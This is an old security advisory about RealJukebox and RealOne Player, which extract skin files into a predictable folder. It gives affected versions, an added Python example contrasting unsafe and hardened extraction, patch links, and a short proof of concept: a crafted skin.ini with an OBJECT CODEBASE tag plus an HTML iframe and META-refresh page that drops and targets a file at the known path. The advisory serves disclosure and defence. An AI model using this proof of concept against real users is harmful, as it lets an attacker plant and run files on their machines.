
Real Networks RealJukebox Predictable File Extraction Vulnerability


Published: 2002-07-15
Updated: 2002-07-15
Severity:
Threat level: Other
Error type: Design error
Exploitation method: Server mode

BUGTRAQ ID:5210

Affected systems
Real Networks RealJukebox 2 for Windows 1.0.2 .379
Real Networks RealJukebox 2 for Windows 1.0.2 .340
Real Networks RealJukebox 2 Plus for Windows 1.0.2 .379
Real Networks RealJukebox 2 Plus for Windows 1.0.2 .340
Real Networks RealOne Player Gold for Windows 6.0.10 .505
   - Microsoft Windows 2000 Advanced Server
   - Microsoft Windows 2000 Advanced Server SP1
   - Microsoft Windows 2000 Advanced Server SP2
   - Microsoft Windows 2000 Datacenter Server
   - Microsoft Windows 2000 Datacenter Server SP1
   - Microsoft Windows 2000 Datacenter Server SP2
   - Microsoft Windows 2000 Professional
   - Microsoft Windows 2000 Professional SP1
   - Microsoft Windows 2000 Professional SP2
   - Microsoft Windows 2000 Server
   - Microsoft Windows 2000 Server SP1
   - Microsoft Windows 2000 Server SP2
   - Microsoft Windows 95
   - Microsoft Windows 95 SR2
   - Microsoft Windows 98
   - Microsoft Windows 98SE
   - Microsoft Windows ME
   - Microsoft Windows NT Enterprise Server 4.0
   - Microsoft Windows NT Enterprise Server 4.0 SP1
   - Microsoft Windows NT Enterprise Server 4.0 SP2
   - Microsoft Windows NT Enterprise Server 4.0 SP3
   - Microsoft Windows NT Enterprise Server 4.0 SP4
   - Microsoft Windows NT Enterprise Server 4.0 SP5
   - Microsoft Windows NT Enterprise Server 4.0 SP6
   - Microsoft Windows NT Enterprise Server 4.0 SP6a
   - Microsoft Windows NT Server 4.0
   - Microsoft Windows NT Server 4.0 SP1
   - Microsoft Windows NT Server 4.0 SP2
   - Microsoft Windows NT Server 4.0 SP3
   - Microsoft Windows NT Server 4.0 SP4
   - Microsoft Windows NT Server 4.0 SP5
   - Microsoft Windows NT Server 4.0 SP6
   - Microsoft Windows NT Server 4.0 SP6a
   - Microsoft Windows NT Workstation 4.0
   - Microsoft Windows NT Workstation 4.0 SP1
   - Microsoft Windows NT Workstation 4.0 SP2
   - Microsoft Windows NT Workstation 4.0 SP3
   - Microsoft Windows NT Workstation 4.0 SP4
   - Microsoft Windows NT Workstation 4.0 SP5
   - Microsoft Windows NT Workstation 4.0 SP6
   - Microsoft Windows NT Workstation 4.0 SP6a
   - Microsoft Windows XP Home
   - Microsoft Windows XP Professional
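Detailed description
The Real software RealJukebox 2 and Real Player Gold contain a vulnerability: when a skin file is opened, the files contained in the skin are extracted to a known location on the client. This lets an attacker deliver a skin file to place files at a predictable location and, by exploiting some other vulnerabilities, execute the file through a "file://" link.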
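The design error described above, shown as an added example that is not part of the advisory and is not Real Networks' patch: extracting an archive into a fixed, well-known folder next to a hardened variant that validates member names and unpacks into a randomly named directory. The folder name, function names and the sample archive are hypothetical and constructed for illustration; the member-name check goes slightly beyond the advisory's case.

```python
import io
import os
import tempfile
import zipfile

# Hypothetical fixed folder name, standing in for a product's temp directory.
FIXED_DIR_NAME = "skin_temp0"


def build_sample_skin() -> bytes:
    """Constructed sample: a ZIP archive holding a single skin.ini."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("skin.ini", "[skin]\nname=sample\n")
    return buf.getvalue()


def extract_predictable(skin: bytes, base: str) -> str:
    """Weak pattern: every archive unpacks into the same well-known folder."""
    dest = os.path.join(base, FIXED_DIR_NAME)
    os.makedirs(dest, exist_ok=True)
    with zipfile.ZipFile(io.BytesIO(skin)) as zf:
        zf.extractall(dest)
    return dest


def extract_unpredictable(skin: bytes, base: str) -> str:
    """Hardened pattern: validate member names, then use a random directory."""
    with zipfile.ZipFile(io.BytesIO(skin)) as zf:
        for info in zf.infolist():
            name = info.filename.replace("\\", "/")
            # Reject absolute paths, drive letters and parent references.
            if name.startswith("/") or ":" in name or ".." in name.split("/"):
                raise ValueError(f"unsafe member name: {info.filename!r}")
        # mkdtemp picks a random suffix; owner-only permissions on POSIX.
        dest = tempfile.mkdtemp(prefix="skin_", dir=base)
        zf.extractall(dest)
    return dest


def demo() -> dict:
    """Extract the same sample twice with each pattern and compare paths."""
    skin = build_sample_skin()
    with tempfile.TemporaryDirectory() as base:
        weak = [extract_predictable(skin, base) for _ in range(2)]
        safe = [extract_unpredictable(skin, base) for _ in range(2)]
        return {"weak_same": weak[0] == weak[1],
                "safe_same": safe[0] == safe[1],
                "safe_has_ini": os.path.isfile(os.path.join(safe[0], "skin.ini"))}
```

With the random directory, a page that triggers extraction can no longer name the resulting file in advance, which removes the precondition the description relies on.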

Test code
Create a skin.ini file containing the following HTML tags:

[skin.ini]

<html>
<OBJECT CLASSID='CLSID:15589FA1-C456-11CE-BF01-00AA0055595A'
CODEBASE='file://c:\winnt\notepad.exe'></OBJECT>
</html>

After compressing it, rename the ZIP to "rjs", then create an HTML file that includes the exploit.rjs file above and have the target user browse to it:

<html>
<META HTTP-EQUIV="Refresh" CONTENT="20;URL=file://c:\Program Files\Real\RealJukebox\temp\~rjbtemp0\skin.ini">
<iframe src="exploit.rjs">
</html>

After IE browses test.html, notepad.exe is placed in the c:\Program Files\Real\RealJukebox\temp\~rjbtemp0 directory.

Solution
Patch downloads:

Real Networks RealJukebox 2 for Windows 1.0.2 .379:

Real Networks Patch skinpfree2.rmp
http://www.service.real.com/help/faq/security/07092002/skinpfree2.rmp

Real Networks RealJukebox 2 Plus for Windows 1.0.2 .379:

Real Networks Patch skinpplus2.rmp
http://www.service.real.com/help/faq/security/07092002/skinpplus2.rmp

Real Networks RealJukebox 2 Plus for Windows 1.0.2 .340:

Real Networks Patch skinpplus1.rmp
http://www.service.real.com/help/faq/security/07092002/skinpplus1.rmp

Real Networks RealJukebox 2 for Windows 1.0.2 .340:

Real Networks Patch skinpfree1.rmp
http://www.service.real.com/help/faq/security/07092002/skinpfree1.rmp

Real Networks RealOne Player Gold for Windows 6.0.10 .505:

Real Networks Patch skinpatchr11s.rmp
http://www.service.real.com/help/faq/security/07092002/skinpatchr11s.rmp

Related information
Reference: http://online.securityfocus.com/archive/1/281916
Related home page: http://www.service.real.com/help/faq/security/bufferoverrun07092002.html